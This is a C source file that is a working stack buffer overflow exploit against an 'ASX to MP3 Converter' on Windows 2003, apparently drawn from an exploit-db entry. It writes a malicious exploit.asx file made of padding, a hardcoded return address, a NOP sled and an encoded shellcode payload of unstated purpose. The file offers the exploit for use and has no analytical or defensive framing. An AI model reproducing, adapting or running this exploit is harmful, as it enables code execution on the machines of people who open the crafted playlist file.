/*
ASX to MP3 Converter SOF - Ivan Ivanovic Ivanov Иван-дурак
недействительный 31337 Team
holahola ~ https://www.exploit-db.com/exploits/38382/
Winblows 2k3
*/
#include <stdio.h>
#include <windows.h>
#include <malloc.h>
int main() {
int i;
char *overwrite_offset = malloc(255);
for(i = 0; i < 255; i += 5) {
char padding[] = "\x41\x41\x41\x41\x41";
memcpy(overwrite_offset + i, padding, strlen(padding));
}
memset(overwrite_offset + _msize(overwrite_offset) - 1, 0x00, 1);
char retn[] = "\x92\x72\x23\x74";
char shellcode[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" // NOP sled
"\xdb\xc8\xd9\x74\x24\xf4\xbd\xaf\x93\x43\xb4\x5e\x31\xc9\xb1"
"\x52\x31\x6e\x17\x83\xee\xfc\x03\xc1\x80\xa1\x41\xe1\x4f\xa7"
"\xaa\x19\x90\xc8\x23\xfc\xa1\xc8\x50\x75\x91\xf8\x13\xdb\x1e"
"\x72\x71\xcf\x95\xf6\x5e\xe0\x1e\xbc\xb8\xcf\x9f\xed\xf9\x4e"
"\x1c\xec\x2d\xb0\x1d\x3f\x20\xb1\x5a\x22\xc9\xe3\x33\x28\x7c"
"\x13\x37\x64\xbd\x98\x0b\x68\xc5\x7d\xdb\x8b\xe4\xd0\x57\xd2"
"\x26\xd3\xb4\x6e\x6f\xcb\xd9\x4b\x39\x60\x29\x27\xb8\xa0\x63"
"\xc8\x17\x8d\x4b\x3b\x69\xca\x6c\xa4\x1c\x22\x8f\x59\x27\xf1"
"\xed\x85\xa2\xe1\x56\x4d\x14\xcd\x67\x82\xc3\x86\x64\x6f\x87"
"\xc0\x68\x6e\x44\x7b\x94\xfb\x6b\xab\x1c\xbf\x4f\x6f\x44\x1b"
"\xf1\x36\x20\xca\x0e\x28\x8b\xb3\xaa\x23\x26\xa7\xc6\x6e\x2f"
"\x04\xeb\x90\xaf\x02\x7c\xe3\x9d\x8d\xd6\x6b\xae\x46\xf1\x6c"
"\xd1\x7c\x45\xe2\x2c\x7f\xb6\x2b\xeb\x2b\xe6\x43\xda\x53\x6d"
"\x93\xe3\x81\x22\xc3\x4b\x7a\x83\xb3\x2b\x2a\x6b\xd9\xa3\x15"
"\x8b\xe2\x69\x3e\x26\x19\xfa\xed\xa7\x55\x71\x85\xc5\x95\x84"
"\xed\x43\x73\xec\x01\x02\x2c\x99\xb8\x0f\xa6\x38\x44\x9a\xc3"
"\x7b\xce\x29\x34\x35\x27\x47\x26\xa2\xc7\x12\x14\x65\xd7\x88"
"\x30\xe9\x4a\x57\xc0\x64\x77\xc0\x97\x21\x49\x19\x7d\xdc\xf0"
"\xb3\x63\x1d\x64\xfb\x27\xfa\x55\x02\xa6\x8f\xe2\x20\xb8\x49"
"\xea\x6c\xec\x05\xbd\x3a\x5a\xe0\x17\x8d\x34\xba\xc4\x47\xd0"
"\x3b\x27\x58\xa6\x43\x62\x2e\x46\xf5\xdb\x77\x79\x3a\x8c\x7f"
"\x02\x26\x2c\x7f\xd9\xe2\x5c\xca\x43\x42\xf5\x93\x16\xd6\x98"
"\x23\xcd\x15\xa5\xa7\xe7\xe5\x52\xb7\x82\xe0\x1f\x7f\x7f\x99"
"\x30\xea\x7f\x0e\x30\x3f";
int buffer_size = _msize(overwrite_offset) + strlen(retn) + strlen(shellcode);
char *buffer = malloc(buffer_size);
memcpy(buffer, overwrite_offset, _msize(overwrite_offset));
memcpy(buffer + _msize(overwrite_offset), retn, strlen(retn));
memcpy(buffer + _msize(overwrite_offset) + strlen(retn), shellcode, strlen(shellcode));
memset(buffer + buffer_size - 1, 0x00, 1);
FILE * fp;
fp = fopen("exploit.asx","w");
fprintf(fp, buffer);
fclose(fp);
return 0;
}